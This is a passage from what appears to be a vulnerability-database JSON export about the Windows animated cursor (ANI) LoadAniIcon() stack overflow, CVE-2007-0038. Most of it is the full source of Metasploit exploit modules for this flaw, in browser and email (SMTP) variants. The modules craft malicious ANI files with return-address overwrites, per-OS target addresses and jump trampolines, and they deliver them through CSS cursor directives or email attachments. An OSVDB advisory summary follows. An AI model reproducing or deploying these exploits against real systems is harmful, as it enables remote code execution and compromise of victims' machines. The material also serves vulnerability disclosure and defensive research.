/.*=(\\d+)/) \ntarg = $1.to_i \nend \n \nmext = ruri =~ /\\.(...)$/ \nif (not (mext and exts.include?($1))) \n \nhtml = \n\"<html><head><title>\" + \nrand_text_alphanumeric(rand(128)+4) + \n\"</title>\" + \n\"</head><body>\" + rand_text_alphanumeric(rand(128)+1) \n \nmytargs = (target.name =~ /Automatic/) ? targets : [target] \n \nif target.name =~ /Automatic/ \ntargets.each_index { |i| \nnext if not targets[i].ret \nnext if not targets[i].name =~ ros \nhtml << generate_div(gext, i) \n} \nelse \nhtml << generate_div(gext, target_index) \nend \n \nhtml << \"</body></html>\" \n \nsend_response_html(cli, html) \nreturn \nend \n \n# Set the requested target \nif (targ and targets[targ]) \nmytarget = targets[targ] \nend \n \n# Re-generate the payload, using the explicit target \nreturn if ((p = regenerate_payload(cli, nil, nil, target)) == nil) \n \nprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the compressed response to the client \nsend_response(cli, generate_ani(p, mytarget), { 'Content-Type' => 'application/octet-stream' }) \n \nhandler(cli) \nend \n \ndef generate_div(gext, targ) \n\"<div style='\" + \ngenerate_css_padding() + \nRex::Text.to_rand_case(\"cursor\") + \ngenerate_css_padding() + \n\":\" + \ngenerate_css_padding() + \nRex::Text.to_rand_case(\"url(\") + \ngenerate_css_padding() + \n'\"' + \nget_resource + '/' + rand_text_alphanumeric(rand(80)+16) + \".#{gext}\" + \n\"?#{rand_text_alpha(rand(12)+1)}=#{targ}\" + \n'\"' + \ngenerate_css_padding() + \n\");\" + \ngenerate_css_padding() + \n\"'>\" + \ngenerate_padding() + \n\"</div>\" \nend \n \ndef generate_ani(payload, target) \n \n# Build the first ANI header \nanih_a = [ \n36, # DWORD cbSizeof \nrand(128)+16, # DWORD cFrames \nrand(1024)+1, # DWORD cSteps \n0, # DWORD cx,cy (reserved - 0) \n0, # DWORD cBitCount, cPlanes (reserved - 0) \n0, 0, 0, # JIF jifRate \n1 # DWORD flags \n].pack('V9') \n \nanih_b = nil \n \nif (target.name =~ /Vista/) \n# Vista has ebp=80, eip=84 \nanih_b = rand_text(84) \n \n# Overwrite local counter variable and pointers \nanih_b[68, 12] = [0].pack('V') * 3 \nelse \n# XP/2K has ebp=76 and eip=80 \nanih_b = rand_text(80) \n \n# Overwrite locals with invalid pointers \nanih_b[64, 12] = [0].pack('V') * 3 \nend \n \n# Overwrite the return with address of a \"call ptr [ebx+4]\" \nanih_b << [target.ret].pack('V')[0, target['Len'] ? target['Len'] : 4] \n \n# Begin the ANI chunk \nriff = \"ACON\" \n \n# Calculate the data offset for the trampoline chunk and add \n# the trampoline chunk if we're attacking Vista \nif target.name =~ /Vista/ \ntrampoline_doffset = riff.length + 8 \n \nriff << generate_trampoline_riff_chunk \nend \n \n# Insert random RIFF chunks \n0.upto(rand(128)+16) do |i| \nriff << generate_riff_chunk() \nend \n \n# Embed the first ANI header \nriff << \"anih\" + [anih_a.length].pack('V') + anih_a \n \n# Insert random RIFF chunks \n0.upto(rand(128)+16) do |i| \nriff << generate_riff_chunk() \nend \n \n# Trigger the return address overwrite \nriff << \"anih\" + [anih_b.length].pack('V') + anih_b \n \n# If this is a Vista target, then we need to align the length of the \n# RIFF chunk so that the low order two bytes are equal to a jmp $+0x16 \nif target.name =~ /Vista/ \nplen = (riff.length & 0xffff0000) | 0x0eeb \nplen += 0x10000 if (plen - 8) < riff.length \n \nriff << generate_riff_chunk((plen - 8) - riff.length) \n \n# Replace the operand to the relative jump to point into the actual \n# payload itself which comes after the riff chunk \nriff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 5].pack('V') \nend \n \n# Place the RIFF chunk in front and off we go \nret = \"RIFF\" + [riff.length].pack('V') + riff \n \n# We copy the encoded payload to the stack because sometimes the RIFF \n# image is mapped in read-only pages. This would prevent in-place \n# decoders from working, and we can't have that. \nret << Rex::Arch::X86.copy_to_stack(payload.encoded.length) \n \n# Place the real payload right after it. \nret << payload.encoded \n \nret \nend \n \n# Generates a riff chunk with the first bytes of the data being a relative \n# jump. This is used to bounce to the actual payload \ndef generate_trampoline_riff_chunk \ntag = Rex::Text.to_rand_case(rand_text_alpha(4)) \ndat = \"\\xe9\\xff\\xff\\xff\\xff\" + rand_text(1) + (rand_text(rand(256)+1) * 2) \ntag + [dat.length].pack('V') + dat \nend \n \ndef generate_riff_chunk(len = (rand(256)+1) * 2) \ntag = Rex::Text.to_rand_case(rand_text_alpha(4)) \ndat = rand_text(len) \ntag + [dat.length].pack('V') + dat \nend \n \ndef generate_css_padding \nbuf = \ngenerate_whitespace() + \n\"/*\" + \ngenerate_whitespace() + \ngenerate_padding() + \ngenerate_whitespace() + \n\"*/\" + \ngenerate_whitespace() \nend \n \ndef generate_whitespace \nlen = rand(100)+2 \nset = \"\\x09\\x20\\x0d\\x0a\" \nbuf = '' \n \nwhile (buf.length < len) \nbuf << set[rand(set.length)].chr \nend \nbuf \nend \n \ndef generate_padding \nrand_text_alphanumeric(rand(128)+4) \nend \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/55551/ani_loadimage_chunksize-browser.rb.txt"}, {"lastseen": "2016-12-05T22:24:34", "references": [], "edition": 1, "description": "", "reporter": "H D Moore", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Windows ANI LoadAniIcon() Chunk Size Stack Overflow (SMTP)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "modified": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83052/Windows-ANI-LoadAniIcon-Chunk-Size-Stack-Overflow-SMTP.html", "id": "PACKETSTORM:83052", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \n# \n# This module sends email messages via smtp \n# \ninclude Msf::Exploit::Remote::SMTPDeliver \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Windows ANI LoadAniIcon() Chunk Size Stack Overflow (SMTP)', \n'Description' => %q{ \nThis module exploits a buffer overflow vulnerability in the \nLoadAniIcon() function of USER32.dll. The flaw is triggered \nthrough Outlook Express by using the CURSOR style sheet \ndirective to load a malicious .ANI file. \n \nThis vulnerability was discovered by Alexander Sotirov of Determina \nand was rediscovered, in the wild, by McAfee. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'hdm', # First version \n'skape', # Vista support \n], \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2007-0038'], \n['CVE', '2007-1765'], \n['OSVDB', '33629'], \n['BID', '23194'], \n['URL', 'http://www.microsoft.com/technet/security/advisory/935423.mspx'], \n['URL', 'http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp'], \n['URL', 'http://www.determina.com/security.research/vulnerabilities/ani-header.html'], \n], \n'Stance' => Msf::Exploit::Stance::Passive, \n'DefaultOptions' => \n{ \n# Cause internet explorer to exit after the code hits \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1024 + (rand(1000)), \n'MinNops' => 32, \n'Compat' => \n{ \n'ConnectionType' => '-bind -find', \n}, \n \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n \n# \n# Use multiple cursor URLs to try all targets. This can result in \n# multiple, sequential sessions \n# \n \n[ 'Automatic', {} ], \n \n# \n# The following targets use call [ebx+4], just like the original exploit \n# \n \n# Partial overwrite doesn't work for Outlook Express \n[ 'Windows XP SP2 user32.dll 5.1.2600.2622', { 'Ret' => 0x25ba, 'Len' => 2 }], \n \n# Should work for all English XP SP2 \n[ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }], \n \n# Supplied by Fabrice MOURRON <fab[at]revhosts.net> \n[ 'Windows XP SP2 userenv.dll French', { 'Ret' => 0x7699c81a }], \n \n# Should work for English XP SP0/SP1 \n[ 'Windows XP SP0/SP1 netui2.dll English', { 'Ret' => 0x71bd0205 }], \n \n# Should work for English 2000 SP0-SP4+ \n[ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }], \n \n# \n# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start \n# of the RIFF chunk itself. The length field of the RIFF chunk \n# tag contains a short jump into an embedded riff chunk that \n# makes a long relative jump into the actual payload. \n# \n[ 'Windows Vista user32.dll 6.0.6000.16386', \n{ \n'Ret' => 0x700b, \n'Len' => 2, \n \n# On Vista, the pages that contain the RIFF are read-only. \n# In-place decoders cannot be used. \n'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw } \n} \n], \n \n# \n# Supplied by ramon[at]risesecurity.org \n# \n \n# call [ebx+4] \n[ 'Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language', { 'Ret' => 0x25d0, 'Len' => 2 }], \n[ 'Windows XP SP2 user32.dll (5.1.2600.2180) English', { 'Ret' => 0x77d825d0 }], \n[ 'Windows XP SP2 userenv.dll Portuguese (Brazil)', { 'Ret' => 0x769dc81a }], \n \n# call [esi+4] \n[ 'Windows XP SP1a userenv.dll English', { 'Ret' => 0x75a758b1 }], \n[ 'Windows XP SP1a shell32.dll English', { 'Ret' => 0x77441a66 }] \n], \n'DisclosureDate' => 'Mar 28 2007', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('MAILSUBJECT', [false, \"The subject of the sent email\"]) \n], self.class) \n \nend \n \ndef autofilter \nfalse \nend \n \ndef exploit \n \nexts = ['bmp', 'wav', 'png', 'zip', 'tar'] \n \ngext = exts[rand(exts.length)] \nname = rand_text_alpha(rand(10)+1) + \".#{gext}\" \n \nanis = {} \n \nhtml = \n\"<html><head><title>\" + \nrand_text_alphanumeric(rand(128)+4) + \n\"</title>\" + \n\"</head><body>\" + rand_text_alphanumeric(rand(128)+1) \n \n \nmytargs = (target.name =~ /Automatic/) ? targets : [target] \n \nif target.name =~ /Automatic/ \ntargets.each_index { |i| \nnext if not targets[i].ret \nacid = generate_cid \nhtml << generate_div(\"cid:#{acid}\") \n \n# Re-generate the payload, using the explicit target \nreturn if ((p = regenerate_payload(nil, nil, targets[i])) == nil) \n \n# Generate an ANI file for this target \nanis[acid] = generate_ani(p, targets[i]) \n} \nelse \nacid = generate_cid \nhtml << generate_div(\"cid:#{acid}\") \n \n# Re-generate the payload, using the explicit target \nreturn if ((p = regenerate_payload(nil, nil, target)) == nil) \n \n# Generate an ANI file for this target \nanis[acid] = generate_ani(p, target) \nend \n \nhtml << \"</body></html>\" \n \n \nmsg = Rex::MIME::Message.new \nmsg.mime_defaults \nmsg.subject = datastore['MAILSUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1) \nmsg.to = datastore['MAILTO'] \nmsg.from = datastore['MAILFROM'] \n \nmsg.add_part(Rex::Text.encode_base64(html, \"\\r\\n\"), \"text/html\", \"base64\", \"inline\") \nanis.each_pair do |cid,ani| \npart = msg.add_part_attachment(ani, cid + \".\" + gext) \npart.header.set(\"Content-ID\", \"<\"+cid+\">\") \nend \n \nsend_message(msg.to_s) \n \nprint_status(\"Waiting for a payload session (backgrounding)...\") \nend \n \ndef generate_cid \nrand_text_alphanumeric(32)+'@'+rand_text_alphanumeric(8) \nend \n \ndef generate_div(url) \n\"<div style='\" + \ngenerate_css_padding() + \nRex::Text.to_rand_case(\"cursor\") + \ngenerate_css_padding() + \n\":\" + \ngenerate_css_padding() + \nRex::Text.to_rand_case(\"url(\") + \ngenerate_css_padding() + \n\"\\\"#{url}\\\"\" + \ngenerate_css_padding() + \n\");\" + \ngenerate_css_padding() + \n\"'>\" + \ngenerate_padding() + \n\"</div>\" \nend \n \ndef generate_ani(payload, target) \n \n# Build the first ANI header \nanih_a = [ \n36, # DWORD cbSizeof \nrand(128)+16, # DWORD cFrames \nrand(1024)+1, # DWORD cSteps \n0, # DWORD cx,cy (reserved - 0) \n0, # DWORD cBitCount, cPlanes (reserved - 0) \n0, 0, 0, # JIF jifRate \n1 # DWORD flags \n].pack('V9') \n \nanih_b = nil \n \nif (target.name =~ /Vista/) \n# Vista has ebp=80, eip=84 \nanih_b = rand_text(84) \n \n# Patch local variables and loop counters \nanih_b[68, 12] = [0].pack(\"V\") * 3 \nelse \n# XP/2K has ebp=76 and eip=80 \nanih_b = rand_text(80) \n \n# Patch local variables and loop counters \nanih_b[64, 12] = [0].pack(\"V\") * 3 \nend \n \n# Overwrite the return with address of a \"call ptr [ebx+4]\" \nanih_b << [target.ret].pack('V')[0, target['Len'] ? target['Len'] : 4] \n \n# Begin the ANI chunk \nriff = \"ACON\" \n \n# Calculate the data offset for the trampoline chunk and add \n# the trampoline chunk if we're attacking Vista \nif target.name =~ /Vista/ \ntrampoline_doffset = riff.length + 8 \n \nriff << generate_trampoline_riff_chunk \nend \n \n# Insert random RIFF chunks \n0.upto(rand(128)+16) do |i| \nriff << generate_riff_chunk() \nend \n \n# Embed the first ANI header \nriff << \"anih\" + [anih_a.length].pack('V') + anih_a \n \n# Insert random RIFF chunks \n0.upto(rand(128)+16) do |i| \nriff << generate_riff_chunk() \nend \n \n# Trigger the return address overwrite \nriff << \"anih\" + [anih_b.length].pack('V') + anih_b \n \n# If this is a Vista target, then we need to align the length of the \n# RIFF chunk so that the low order two bytes are equal to a jmp $+0x16 \nif target.name =~ /Vista/ \nplen = (riff.length & 0xffff0000) | 0x0eeb \nplen += 0x10000 if (plen - 8) < riff.length \n \nriff << generate_riff_chunk((plen - 8) - riff.length) \n \n# Replace the operand to the relative jump to point into the actual \n# payload itself which comes after the riff chunk \nriff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 5].pack('V') \nend \n \n# Place the RIFF chunk in front and off we go \nret = \"RIFF\" + [riff.length].pack('V') + riff \n \n# We copy the encoded payload to the stack because sometimes the RIFF \n# image is mapped in read-only pages. This would prevent in-place \n# decoders from working, and we can't have that. \nret << Rex::Arch::X86.copy_to_stack(payload.encoded.length) \n \n# Place the real payload right after it. \nret << payload.encoded \n \nret \n \nend \n \n# Generates a riff chunk with the first bytes of the data being a relative \n# jump. This is used to bounce to the actual payload \ndef generate_trampoline_riff_chunk \ntag = Rex::Text.to_rand_case(rand_text_alpha(4)) \ndat = \"\\xe9\\xff\\xff\\xff\\xff\" + rand_text(1) + (rand_text(rand(256)+1) * 2) \ntag + [dat.length].pack('V') + dat \nend \n \ndef generate_riff_chunk(len = (rand(256)+1) * 2) \ntag = Rex::Text.to_rand_case(rand_text_alpha(4)) \ndat = rand_text(len) \ntag + [dat.length].pack('V') + dat \nend \n \ndef generate_css_padding \nbuf = \ngenerate_whitespace() + \n\"/*\" + \ngenerate_whitespace() + \ngenerate_padding() + \ngenerate_whitespace() + \n\"*/\" + \ngenerate_whitespace() \nend \n \ndef generate_whitespace \nlen = rand(100)+2 \nset = \"\\x09\\x20\\x0d\\x0a\" \nbuf = '' \n \nwhile (buf.length < len) \nbuf << set[rand(set.length)].chr \nend \nbuf \nend \n \ndef generate_padding \nrand_text_alphanumeric(rand(128)+4) \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83052/ani_loadimage_chunksize.rb.txt"}, {"lastseen": "2016-12-05T22:15:33", "references": [], "edition": 1, "description": "", "reporter": "Matt Miller", "published": "2007-04-03T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "ani_loadimage_chunksize-email.rb.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "modified": "2007-04-03T00:00:00", "href": "https://packetstormsecurity.com/files/55552/ani_loadimage_chunksize-email.rb.txt.html", "id": "PACKETSTORM:55552", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/projects/Framework/ \n## \n \n \nrequire 'msf/core' \n \nmodule Msf \n \nclass Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote \n \n# \n# This module sends email messages via smtp \n# \ninclude Exploit::Remote::SMTPDeliver \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Windows ANI LoadAniIcon() Chunk Size Stack Overflow (SMTP)', \n'Description' => %q{ \nThis module exploits a buffer overflow vulnerability in the \nLoadAniIcon() function of USER32.dll. The flaw is triggered \nthrough Outlook Express by using the CURSOR style sheet \ndirective to load a malicious .ANI file. \n \nThis vulnerability was discovered by Alexander Sotirov of Determina \nand was rediscovered, in the wild, by McAfee. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'hdm', # First version \n'skape', # Vista support \n], \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2007-0038'], \n['CVE', '2007-1765'], \n['BID', '23194'], \n['URL', 'http://www.microsoft.com/technet/security/advisory/935423.mspx'], \n['URL', 'http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp'], \n['URL', 'http://www.determina.com/security.research/vulnerabilities/ani-header.html'], \n], \n'Stance' => Msf::Exploit::Stance::Passive, \n'DefaultOptions' => \n{ \n# Cause internet explorer to exit after the code hits \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1024 + (rand(1000)), \n'MinNops' => 32, \n'Compat' => \n{ \n'ConnectionType' => '-bind -find', \n}, \n \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n \n# \n# Use multiple cursor URLs to try all targets. This can result in \n# multiple, sequential sessions \n# \n \n[ 'Automatic', {} ], \n \n# \n# The following targets use call [ebx+4], just like the original exploit \n# \n \n# Partial overwrite doesn't work for Outlook Express \n[ 'Windows XP SP2 user32.dll 5.1.2600.2622', { 'Ret' => 0x25ba, 'Len' => 2 }], \n \n# Should work for all English XP SP2 \n[ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }], \n \n# Should work for English XP SP0/SP1 \n[ 'Windows XP SP0/SP1 netui2.dll English', { 'Ret' => 0x71bd0205 }], \n \n# Should work for English 2000 SP0-SP4+ \n[ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }], \n \n \n# \n# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start \n# of the RIFF chunk itself. The length field of the RIFF chunk \n# tag contains a short jump into an embedded riff chunk that \n# makes a long relative jump into the actual payload. \n# \n[ 'Windows Vista user32.dll 6.0.6000.16386', \n{ \n'Ret' => 0x700b, \n'Len' => 2, \n \n# On Vista, the pages that contain the RIFF are read-only. \n# In-place decoders cannot be used. \n'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw } \n} \n] \n], \n'DisclosureDate' => 'Mar 28 2007', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('MAILSUBJECT', [false, \"The subject of the sent email\"]) \n], self.class) \n \nend \n \ndef autofilter \nfalse \nend \n \ndef exploit \n \nexts = ['bmp', 'wav', 'png', 'zip', 'tar'] \n \ngext = exts[rand(exts.length)] \nname = rand_text_alpha(rand(10)+1) + \".#{gext}\" \n \nanis = {} \n \nhtml = \n\"<html><head><title>\" + \nrand_text_alphanumeric(rand(128)+4) + \n\"</title>\" + \n\"</head><body>\" + rand_text_alphanumeric(rand(128)+1) \n \n \nmytargs = (target.name =~ /Automatic/) ? targets : [target] \n \nif target.name =~ /Automatic/ \ntargets.each_index { |i| \nnext if not targets[i].ret \nacid = generate_cid \nhtml << generate_div(\"cid:#{acid}\") \n \n# Re-generate the payload, using the explicit target \nreturn if ((p = regenerate_payload(nil, nil, targets[i])) == nil) \n \n# Generate an ANI file for this target \nanis[acid] = generate_ani(p, targets[i]) \n} \nelse \nacid = generate_cid \nhtml << generate_div(\"cid:#{acid}\") \n \n# Re-generate the payload, using the explicit target \nreturn if ((p = regenerate_payload(nil, nil, target)) == nil) \n \n# Generate an ANI file for this target \nanis[acid] = generate_ani(p, target) \nend \n \nhtml << \"</body></html>\" \n \n \nmsg = Rex::MIME::Message.new \nmsg.mime_defaults \nmsg.subject = datastore['MAILSUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1) \nmsg.to = datastore['MAILTO'] \nmsg.from = datastore['MAILFROM'] \n \nmsg.add_part(Rex::Text.encode_base64(html, \"\\r\\n\"), \"text/html\", \"base64\", \"inline\") \nanis.each_pair do |cid,ani| \npart = msg.add_part_attachment(ani, cid + \".\" + gext) \npart.header.set(\"Content-ID\", \"<\"+cid+\">\") \nend \n \nsend_message(msg.to_s) \n \nprint_status(\"Waiting for a payload session (backgrounding)...\") \nend \n \ndef generate_cid \nrand_text_alphanumeric(32)+'@'+rand_text_alphanumeric(8) \nend \n \ndef generate_div(url) \n\"<div style='\" + \ngenerate_css_padding() + \nRex::Text.to_rand_case(\"cursor\") + \ngenerate_css_padding() + \n\":\" + \ngenerate_css_padding() + \nRex::Text.to_rand_case(\"url(\") + \ngenerate_css_padding() + \n\"\\\"#{url}\\\"\" + \ngenerate_css_padding() + \n\");\" + \ngenerate_css_padding() + \n\"'>\" + \ngenerate_padding() + \n\"</div>\" \nend \n \ndef generate_ani(payload, target) \n \n# Build the first ANI header \nanih_a = [ \n36, # DWORD cbSizeof \nrand(128)+16, # DWORD cFrames \nrand(1024)+1, # DWORD cSteps \n0, # DWORD cx,cy (reserved - 0) \n0, # DWORD cBitCount, cPlanes (reserved - 0) \n0, 0, 0, # JIF jifRate \n1 # DWORD flags \n].pack('V9') \n \nanih_b = nil \n \nif (target.name =~ /Vista/) \n# Vista has ebp=80, eip=84 \nanih_b = rand_text(83) \nanih_b = Rex::Text.pattern_create(84) \n \n# Overwrite local counter variable and pointers \nanih_b[68, 12] = [0].pack('V') * 3 \nelse \n# XP/2K has ebp=76 and eip=80 \nanih_b = rand_text(80) \nanih_b[64, 16] = [0].pack('V') * 4 \nend \n \n# Overwrite the return with address of a \"call ptr [ebx+4]\" \nanih_b << [target.ret].pack('V')[0, target['Len'] ? target['Len'] : 4] \n \n# Begin the ANI chunk \nriff = \"ACON\" \n \n# Calculate the data offset for the trampoline chunk and add \n# the trampoline chunk if we're attacking Vista \nif target.name =~ /Vista/ \ntrampoline_doffset = riff.length + 8 \n \nriff << generate_trampoline_riff_chunk \nend \n \n# Insert random RIFF chunks \n0.upto(rand(128)+16) do |i| \nriff << generate_riff_chunk() \nend \n \n# Embed the first ANI header \nriff << \"anih\" + [anih_a.length].pack('V') + anih_a \n \n# Insert random RIFF chunks \n0.upto(rand(128)+16) do |i| \nriff << generate_riff_chunk() \nend \n \n# Trigger the return address overwrite \nriff << \"anih\" + [anih_b.length].pack('V') + anih_b \n \n# If this is a Vista target, then we need to align the length of the \n# RIFF chunk so that the low order two bytes are equal to a jmp $+0x16 \nif target.name =~ /Vista/ \nplen = (riff.length & 0xffff0000) | 0x0eeb \nplen += 0x10000 if (plen - 8) < riff.length \n \nriff << generate_riff_chunk((plen - 8) - riff.length) \n \n# Replace the operand to the relative jump to point into the actual \n# payload itself which comes after the riff chunk \nriff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 5].pack('V') \nend \n \n# Place the RIFF chunk in front and off we go \nret = \"RIFF\" + [riff.length].pack('V') + riff \n \n# We copy the encoded payload to the stack because sometimes the RIFF \n# image is mapped in read-only pages. This would prevent in-place \n# decoders from working, and we can't have that. \nret << Rex::Arch::X86.copy_to_stack(payload.encoded.length) \n \n# Place the real payload right after it. \nret << payload.encoded \n \nret \n \nend \n \n# Generates a riff chunk with the first bytes of the data being a relative \n# jump. This is used to bounce to the actual payload \ndef generate_trampoline_riff_chunk \ntag = Rex::Text.to_rand_case(rand_text_alpha(4)) \ndat = \"\\xe9\\xff\\xff\\xff\\xff\" + rand_text(1) + (rand_text(rand(256)+1) * 2) \ntag + [dat.length].pack('V') + dat \nend \n \ndef generate_riff_chunk(len = (rand(256)+1) * 2) \ntag = Rex::Text.to_rand_case(rand_text_alpha(4)) \ndat = rand_text(len) \ntag + [dat.length].pack('V') + dat \nend \n \ndef generate_css_padding \nbuf = \ngenerate_whitespace() + \n\"/*\" + \ngenerate_whitespace() + \ngenerate_padding() + \ngenerate_whitespace() + \n\"*/\" + \ngenerate_whitespace() \nend \n \ndef generate_whitespace \nlen = rand(100)+2 \nset = \"\\x09\\x20\\x0d\\x0a\" \nbuf = '' \n \nwhile (buf.length < len) \nbuf << set[rand(set.length)].chr \nend \nbuf \nend \n \ndef generate_padding \nrand_text_alphanumeric(rand(128)+4) \nend \n \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/55552/ani_loadimage_chunksize-email.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:29", "references": [], "description": "## Vulnerability Description\nA remote overflow exists in Microsoft Internet Explorer. The browser fails to check the buffer on animated cursors and icons resulting in a stack buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.\n## Short Description\nA remote overflow exists in Microsoft Internet Explorer. The browser fails to check the buffer on animated cursors and icons resulting in a stack buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor Specific Solution URL: http://www.microsoft.com/technet/security/bulletin/ms07-apr.mspx\nVendor Specific News/Changelog Entry: http://blogs.technet.com/msrc/archive/2007/04/01/latest-on-security-update-for-microsoft-security-advisory-935423.aspx\nVendor Specific News/Changelog Entry: http://www.microsoft.com/technet/security/advisory/935423.mspx\n[Vendor Specific Advisory URL](http://blogs.technet.com/msrc/archive/2007/03/29/microsoft-security-advisory-935423-posted.aspx)\n[Vendor Specific Advisory URL](http://www.microsoft.com/technet/security/advisory/935423.mspx)\nSecurity Tracker: 1017827\n[Secunia Advisory ID:24659](https://secuniaresearch.flexerasoftware.com/advisories/24659/)\nOther Solution URL: http://zert.isotf.org/advisories/zert-2007-01.htm\nOther Solution URL: http://research.eeye.com/html/alerts/zeroday/20070328.html\nOther Advisory URL: http://www.avertlabs.com/research/blog/?p=230\nOther Advisory URL: http://vil.nai.com/vil/content/v_141860.htm\nOther Advisory URL: http://www.avertlabs.com/research/blog/?p=233\nOther Advisory URL: http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp\nNews Article: http://news.softpedia.com/news/Windows-Vista-Suicide-Courtesy-of-McAfee-50761.shtml\nNews Article: http://www.informationweek.com/news/showArticle.jhtml?articleID=198800828\nNews Article: http://www.securityfocus.com/brief/474?ref=rss\nNews Article: http://news.bbc.co.uk/2/hi/technology/6526851.stm\nNews Article: http://www.securityfocus.com/brief/472?ref=rss\nNews Article: http://www.informationweek.com/news/showArticle.jhtml?articleID=198900231\nMicrosoft Security Bulletin: MS07-017\nMicrosoft Knowledge Base Article: 925902\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-03/0470.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0013.html\nGeneric Exploit URL: http://whitestar.linuxbox.org/pipermail/exploits/2007-March/000167.html\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3636\nGeneric Exploit URL: http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/email/ani_loadimage_chunksize.rb\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3635\nGeneric Exploit URL: http://asert.arbornetworks.com/2007/04/never-slow-down-ms07-017-ani-exploit\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3634\nGeneric Exploit URL: http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb\nFrSIRT Advisory: ADV-2007-1151\n[CVE-2007-0038](https://vulners.com/cve/CVE-2007-0038)\n[CVE-2007-1765](https://vulners.com/cve/CVE-2007-1765)\nCERT VU: 191609\nBugtraq ID: 23194\n", "edition": 1, "reporter": "OSVDB", "published": "2007-03-29T18:34:47", "title": "Microsoft IE Animated Cursor (.ani) Handling Arbitrary Command Execution", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Internet Explorer", "version": "7", "operator": "eq"}, {"name": "Internet Explorer", "version": "6", "operator": "eq"}], "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "modified": "2007-03-29T18:34:47", "href": "https://vulners.com/osvdb/OSVDB:33629", "id": "OSVDB:33629", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T18:58:08", "osvdbidlist": ["33629"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "MS Windows XP/Vista Animated Cursor (.ANI) Remote Overflow Exploit. CVE-2007-0038,CVE-2007-1765. Remote exploit for windows platform", "reporter": "jamikazu", "published": "2007-04-01T00:00:00", "type": "exploitdb", "title": "Microsoft Windows XP/Vista - Animated Cursor .ANI Remote Overflow Exploit", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "exploit", "cvelist": 